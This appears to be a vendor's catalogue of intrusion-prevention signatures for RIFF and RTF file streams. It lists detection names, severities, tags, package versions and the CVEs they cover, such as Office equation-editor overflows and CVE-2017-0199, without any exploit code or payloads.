Back to top

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
Description:
Back to top

File-RIFF_QLCM-Download

About this situation: Detected a download of QLCM audio file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Mac RealPlayer detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow
Description:
Back to top

File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Helix Community Helix Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Helix Player, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
Description:
Back to top

File-RIFF_RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow-Over-SMTP

About this situation: Attempt to exploit a vulnerability in Helix Community Helix Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Helix Player, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-925-5242
Vulnerability: RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
Description:
Back to top

File-RIFF_RealPlayer-AVI-Parsing-Buffer-Overflow

About this situation: Detects malformed AVI files that could cause a buffer overflow in Realplayer
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rhapsody, RealPlayer, RealOne Player, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: HTTP-RealPlayer-AVI-Parsing-Buffer-Overflow
Description:
Back to top

File-RIFF_RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: RIFF File Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
Description:
Back to top

File-RIFF_RIFFX-Download

About this situation: Detected a download of RIFFX media containter file
Context: RIFF File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Streaming Protocols
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-RIFF_Small-AVI-Container

About this situation: Detects tiny video containers in RIFF-AVI files
Context: RIFF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Vulnerability: Small-AVI-Container
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Attack-Related-Anomalies

About this situation: Test signature to match to a synthetic RIFF file in the Attack Related Anomalies category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Botnet

About this situation: Test signature to match to a synthetic RIFF file in the Botnet category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Compromise

About this situation: Test signature to match to a synthetic RIFF file in the Compromise category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Denial-of-Service

About this situation: Test signature to match to a synthetic RIFF file in the Denial of Service category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Denial of Service
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Disclosure

About this situation: Test signature to match to a synthetic RIFF file in the Disclosure category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Disclosure
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Other-Suspicious-Traffic

About this situation: Test signature to match to a synthetic RIFF file in the Other Suspicious Traffic category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Potential-Botnet

About this situation: Test signature to match to a synthetic RIFF file in the Potential Botnet category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Botnet
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Potential-Compromise

About this situation: Test signature to match to a synthetic RIFF file in the Potential Compromise category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Potential-Denial-of-Service

About this situation: Test signature to match to a synthetic RIFF file in the Potential Denial of Service category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Potential-Disclosure

About this situation: Test signature to match to a synthetic RIFF file in the Potential Disclosure category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Potential-Probe

About this situation: Test signature to match to a synthetic RIFF file in the Potential Probe category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Probe
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Probe

About this situation: Test signature to match to a synthetic RIFF file in the Probe category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Probe
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Protocol-Violations

About this situation: Test signature to match to a synthetic RIFF file in the Protocol Violations category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Spyware-Malware-and-Adware

About this situation: Test signature to match to a synthetic RIFF file in the Spyware, Malware and Adware category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Successful-Attacks

About this situation: Test signature to match to a synthetic RIFF file in the Successful Attacks category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Successful Attacks
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Attack-Related-Anomalies

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Attack Related Anomalies category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Botnet

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Botnet category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Botnet
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Compromise

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Compromise category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Denial-of-Service

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Denial of Service category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Denial of Service
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Disclosure

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Disclosure category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Disclosure
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_Synthetic-Test-Fingeprint-Suspected-Probe

About this situation: Test signature to match to a synthetic RIFF file in the Suspected Probe category
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Probe
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

File-RIFF_VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
Description:
Back to top

File-RIFF_WAVE-Download

About this situation: Detected a download of WAVE audio file
Context: RIFF File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-753-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RIFF_Wordpress-Core-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress detected
Context: RIFF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Wordpress-Core-External-Entity-Injection
Description:
Back to top

File-RTF_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-RTF_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RTF_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RTF_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RTF_Conflicting-Content-Type-Word-Doc

About this situation: Detected conflicting file name extension for an RTF file content
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-RTF_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
Description:
Back to top

File-RTF_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-RTF_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: RTF File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-RTF_Embedded-Zip-File

About this situation: A Zip file embedded in an RTF file
Context: RTF File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

File-RTF_LibreOffice-RTF-Parser-Use-After-Free

About this situation: An attempt to exploit a vulnerability in LibreOffice LibreOffice detected
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreOffice, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-777-5211
Vulnerability: LibreOffice-RTF-Parser-Use-After-Free
Description:
Back to top

File-RTF_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
Description:
Back to top

File-RTF_Microsoft-ActiveX-Code-Execution-CVE-2012-0158

About this situation: An attempt to exploit CVE-2012-0158
Context: RTF File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2012-04, CVE2012, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-ActiveX-Code-Execution-CVE-2012-0158
Description:
Back to top

File-RTF_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-08, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
Description:
Back to top

File-RTF_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
Description:
Back to top

File-RTF_Microsoft-Office-CVE-2016-0021

About this situation: An attempt exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-03, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-742-5211
Last changed: sgpkg-ips-742-5211
Vulnerability: Microsoft-Office-CVE-2016-0021
Description:
Back to top

File-RTF_Microsoft-Office-CVE-2016-3234-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, Microsoft Office, Microsoft Office Compatibility Pack, MS2016-06, CVE2016, Windows not specific, Microsoft Word not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Microsoft-Office-CVE-2016-3234-Information-Disclosure
Description:
Back to top

File-RTF_Microsoft-Office-CVE-2016-3317

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: Microsoft-Office-CVE-2016-3317
Description:
Back to top

File-RTF_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-08, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
Description:
Back to top

File-RTF_Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2018, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1409-5242
Vulnerability: Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2017, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1409-5242
Vulnerability: Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow
Description:
Back to top

File-RTF_Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2007, Microsoft Office 2010, Microsoft Office SharePoint Server 2010, Microsoft Office Web Apps 2010, Microsoft Office Web Apps 2013, Microsoft Sharepoint Server 2013, MS2016-06, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234
Description:
Back to top

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2015-0086

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2015-03, CVE2015, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Microsoft-Office-Memory-Corruption-CVE-2015-0086
Description:
Back to top

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0022

About this situation: A vulnerability in Microsoft Office
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-02, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Microsoft-Office-Memory-Corruption-CVE-2016-0022
Description:
Back to top

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0052

About this situation: A vulnerability in Microsoft Office
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-02, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Microsoft-Office-Memory-Corruption-CVE-2016-0052
Description:
Back to top

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0053

About this situation: A vulnerability in Microsoft Office
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-02, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Microsoft-Office-Memory-Corruption-CVE-2016-0053
Description:
Back to top

File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-3280

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2016-07, CVE2016, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-777-5211
Vulnerability: Microsoft-Office-Memory-Corruption-CVE-2016-3280
Description:
Back to top

File-RTF_Microsoft-Office-RCE-CVE-2017-0199

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2017-04, CVE2017, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-877-5242
Vulnerability: Miscrosoft-Office-RCE-CVE-2017-0199
Description:
Back to top

File-RTF_Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, Microsoft Office 2010, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-486-5211
Vulnerability: Microsoft-Office-RTF-Stack-Overflow-CVE-2010-3333
Description:
Back to top

File-RTF_Microsoft-Office-Suspicious-Ddeauto-Command

About this situation: An RTF file with a suspicious DDE command was detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Microsoft-Office-Suspicious-Ddeauto-Command
Description:
Back to top

File-RTF_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: RTF File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2015-06, CVE2015, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
Description:
Back to top

File-RTF_Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Microsoft-OLE-UtOlePresStmToContentsStm-Use-After-Free-CVE-2025-21298
Description:
Back to top

File-RTF_Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2013-02, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Microsoft-Windows-Common-Controls-Remote-Code-Execution-Vulnerability
Description:
Back to top

File-RTF_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows 8.1, Windows 2012 R2, Any Hardware, MS2015-12, CVE2015, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Vulnerability: Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
Description:
Back to top

File-RTF_Microsoft-Windows-CVE-2017-0042

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: RTF File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Windows-Media-Player-CVE-2017-0042
Description:
Back to top

File-RTF_Microsoft-Windows-Els.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows 7, Windows 8, Windows RT, Windows 2012, Windows 2008, Windows RT 8.1, Windows 8.1, Any Hardware, MS2015-12, CVE2015, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Microsoft-Windows-Els.dll-Insecure-Library-Loading
Description:
Back to top

File-RTF_Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: RTF File Stream
Severity: 7
Tags: Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2015-07, CVE2015, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: Microsoft-Windows-Media-Device-Manager-Insecure-Library-Loading
Description:
Back to top

File-RTF_Microsoft-Windows-MF3216-Component-Heap-Based-Buffer-Overflow

